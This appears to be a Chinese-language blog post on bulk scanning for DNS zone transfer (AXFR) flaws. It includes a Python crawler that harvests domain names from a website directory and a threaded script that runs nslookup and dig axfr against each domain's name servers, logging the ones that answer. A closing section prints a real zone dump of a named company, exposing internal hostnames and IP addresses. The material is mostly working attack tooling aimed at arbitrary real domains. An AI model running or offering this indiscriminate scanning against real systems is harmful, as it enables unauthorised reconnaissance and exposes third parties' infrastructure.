
DNS zone transfer vulnerability(域传送漏洞)批量扫描

原理自行百度,我们直接动手

 

工具

DNS域传送漏洞的验证方式简单粗暴,我简单修改了lijiejie大牛的脚本,做批量: https://github.com/Xyntax/zZone-Transfer

项目结构

采集

采集自http://www.qkankan.com

输入为 qkankan.com 的某栏目 URL,如下例(国内网站列表):http://www.qkankan.com/guonei/all/

import re
import urllib

"""
url采集脚本
仅适用于此站点的list,自动翻页采集
http://www.qkankan.com/
"""

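def _read_page(page_url):
    """Return the body of *page_url*, closing the response afterwards.

    The original opened one response per page and never closed any of them,
    leaving up to thousands of sockets to the garbage collector.
    """
    page = urllib.urlopen(page_url)
    try:
        return page.read()
    finally:
        page.close()


def getHtml(url, max_pages=10000):
    """Fetch a qkankan.com list page and all of its follow-on pages.

    Page 1 is ``url`` itself; page i (2 <= i < max_pages) is fetched from
    ``url + '/index_<i>.html'``.  Pages are appended until one contains
    'message.gif', which the author uses as the end-of-list marker (presumably
    the site's "no such page" image), or until ``max_pages`` is reached.

    Args:
        url: List page to start from, e.g. 'http://www.qkankan.com/guonei/all/'.
        max_pages: Exclusive upper bound on the page index; defaults to the
            original hard-coded 10000.

    Returns:
        The concatenated raw HTML of every collected page.
    """
    print("hello cdxy\n\ntesting page 1")
    html = _read_page(url)
    for i in range(2, max_pages):
        current_html = _read_page(url + '/index_' + str(i) + '.html')
        if 'message.gif' in current_html:
            # First page past the end: report how many real pages there were.
            print("\ntotal_page: " + str(i - 1))
            break
        html += current_html
        print("gathering urls from page:" + str(i))

    return html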

def getUrl(html):
    """Return every (host, terminator) pair for an ``http://`` link in *html*.

    The pattern captures the text after ``http://`` up to the first ``/``,
    ``"`` or ``'``.  Because it has two groups, ``findall`` yields 2-tuples;
    callers read the host from index 0.  A link that has none of those
    terminators, or that spans a newline, is not matched.
    """
    link_pattern = re.compile(r'http://(.*?)(/|\"|\')')  # regex
    return link_pattern.findall(html)

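html = getHtml("http://www.qkankan.com/guonei/all/")  # list page to crawl
ans = getUrl(html)

# Hosts never written out: the site itself and the w3.org namespace URL.
white_list = ['www.w3.org', 'www.qkankan.com', 'm.qkankan.com']
ans_list = []            # unique hosts, in first-seen order
seen = set(white_list)   # O(1) membership instead of scanning ans_list per hit
for each in ans:
    host = each[0]       # group 1 of getUrl's regex: the host part
    if host in seen:
        continue
    seen.add(host)
    ans_list.append(host)

# These names are scraped from a third-party site and are later handed to
# external tools by the checker script, so treat the file as untrusted data.
with open('target_list.txt', 'w') as fobj:  # output path
    fobj.write(''.join(host + '\n' for host in ans_list))

print("\nOver!\nURLs:" + str(len(ans_list)))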

验证

简单的验证脚本,Windows 下使用 nslookup 验证

import os
import re
import subprocess
import threading

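# Domains to check, one per line, as written by the collector script.
# readlines() keeps the trailing newline on every entry and the names later
# end up on a command line, so strip whitespace and drop blank lines here;
# the context manager also closes the file, which the original never did.
with open('target_list.txt') as fobj:
    urls = [eachline.strip() for eachline in fobj if eachline.strip()]

lock = threading.Lock()   # guards c_index and console output across workers
c_index = 0               # next index into urls to be claimed by a worker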

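_DOMAIN_RE = re.compile(r'^[A-Za-z0-9._-]+$')


def _normalize_domain(line):
    """Turn one line of target_list.txt into a bare domain name.

    Whitespace (including the newline readlines() keeps) is removed and a
    leading 'www.' label is dropped with a slice.  The original used
    ``str.lstrip('www.')``, which strips any run of 'w' and '.' characters
    and would turn 'web.example.com' into 'eb.example.com'.
    """
    domain = line.strip()
    if domain.startswith('www.'):
        domain = domain[len('www.'):]
    return domain


def _run(args):
    """Run *args* without a shell and return its stdout as text.

    The command is passed as an argument list, so a domain or server name
    taken from the scraped target list cannot inject shell syntax the way
    the string-built ``os.popen()`` commands could.  stderr stays on the
    console, as before.
    """
    proc = subprocess.Popen(args, stdout=subprocess.PIPE, universal_newlines=True)
    out, _ = proc.communicate()
    return out


def test_DNS_Servers():
    """Worker body: claim domains from the shared list and check each one.

    Under ``lock`` the worker takes the next index of ``urls``, then asks
    nslookup for the domain's NS records and runs ``BIND9\\dig @server axfr
    domain`` for every server found.  A transfer counts as successful when
    dig's output contains the 'XFR size' summary and neither failure marker;
    the hit is appended to vulnerable_hosts.txt and the full output is saved
    to dns\\<server>.txt (the dns directory must already exist).  Returns
    when the list is exhausted.  Uses module globals urls, lock, c_index.
    """
    global c_index
    dig = os.path.join(os.getcwd(), 'BIND9', 'dig')  # loop-invariant tool path
    while True:
        with lock:
            if c_index >= len(urls):
                break    # End of list
            domain = _normalize_domain(urls[c_index])
            c_index += 1
            print("---testing:" + domain)
        if not _DOMAIN_RE.match(domain):
            # Names come from a scraped list; skip anything that is not a
            # plain host name rather than hand it to an external tool.
            continue
        cmd_res = _run(['nslookup', '-type=ns', domain])    # fetch DNS Server List
        dns_servers = re.findall(r'nameserver = ([\w\.]+)', cmd_res)
        for server in dns_servers:
            # NOTE(review): kept from the original; looks like it treats a
            # short name as relative, but it joins without a dot - confirm.
            if len(server) < 5: server += domain
            cmd_res = _run([dig, '@' + server, 'axfr', domain])
            if cmd_res.find('Transfer failed.') < 0 and \
               cmd_res.find('connection timed out') < 0 and \
               cmd_res.find('XFR size') > 0:
                with lock:
                    print('*' * 10 + ' Vulnerable dns server found: ' + server + ' ' + '*' * 10)
                    # Shared append-only log: written under the lock so two
                    # workers cannot interleave their lines.
                    with open('vulnerable_hosts.txt', 'a') as f:
                        f.write('%s    %s\n' % (server.ljust(30), domain))
                # server matched [\w.]+ above, so it cannot carry a path separator.
                with open(os.path.join('dns', server + '.txt'), 'w') as f:
                    f.write(cmd_res)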

# Ten workers share the urls list through c_index; each one returns on its
# own once the list is exhausted, so a plain join is enough here.
threads = [threading.Thread(target=test_DNS_Servers) for _ in range(10)]
for worker in threads:
    worker.start()

for worker in threads:
    worker.join()

print('All Done!')

利用

> .\BIND9\dig.exe @dns01.benq.com axfr benq.com

; <<>> DiG 9.9.5-W1 <<>> @dns01.benq.com axfr benq.com
; (1 server found)
;; global options: +cmd
benq.com.       3600    IN  SOA dns01.benq.com. hostmaster.benq.com. 2004 900 600 259200 3600
benq.com.       3600    IN  A   210.65.248.241
benq.com.       3600    IN  A   23.97.76.217
benq.com.       3600    IN  NS  dns01.benq.com.
benq.com.       3600    IN  NS  dns11.benq.com.
benq.com.       3600    IN  MX  100 imss3.benq.com.
benq.com.       3600    IN  MX  100 imss5.benq.com.
benq.com.       3600    IN  MX  10 imss1.benq.com.
benq.com.       3600    IN  MX  10 imss2.benq.com.
benq.com.       3600    IN  TXT "v=spf1 mx include:_spf-a.benq.com include:_spf-b.benq.com include:_spf-c.benq.com ~all"
benq.com.       3600    IN  TXT "google-site-verification=ibNFzPkik8Va-94fzlu8pBhyajsZ4n77UYuj1rKOLO0"
_spf-a.benq.com.    3600    IN  TXT "v=spf1 ip4:211.78.86.204 ip4:59.125.164.210 ip4:210.65.248.202 ip4:220.128.63.37 ip4:210.65.248.203 ip4:74.10.50.12 ip4:74.11.113.23 ~all"
_spf-b.benq.com.    3600    IN  TXT "v=spf1 ip4:218.4.236.13 ip4:218.4.236.28 ip4:220.128.64.142 ip4:217.21.255.99 ip4:62.2.173.100 ip4:84.233.242.228 ip4:80.252.92.141 ip4:218.4.236.4 ip4:218.4.236.27 ~all"
_spf-c.benq.com.    3600    IN  TXT "v=spf1 ip4:68.225.24.150 ip4:210.65.248.207 ip4:220.128.63.118 ip4:210.65.248.206 ~all"
_autodiscover._tcp.benq.com. 3600 IN    SRV 0 0 443 roh.benq.com.
_sipfederationtls._tcp.benq.com. 3600 IN SRV    0 0 5061 sip.benq.com.
_sip._tls.benq.com. 3600    IN  SRV 0 0 443 sip.benq.com.
abs.benq.com.       3600    IN  A   219.87.79.218
ae.benq.com.        3600    IN  A   220.128.63.69
algeria.benq.com.   3600    IN  A   220.228.13.31
ap.benq.com.        3600    IN  CNAME   newbqp-multi.cloudapp.net.
ap-preview.benq.com.    3600    IN  CNAME   newbqp-multi.cloudapp.net.
...
...
benq.com.       3600    IN  SOA dns01.benq.com. hostmaster.benq.com. 2004 900 600 259200 3600
;; Query time: 173 msec
;; SERVER: 220.128.63.23#53(220.128.63.23)
;; WHEN: Thu Mar 10 23:44:13 中国标准时间 2016
;; XFR size: 500 records (messages 2, bytes 18395)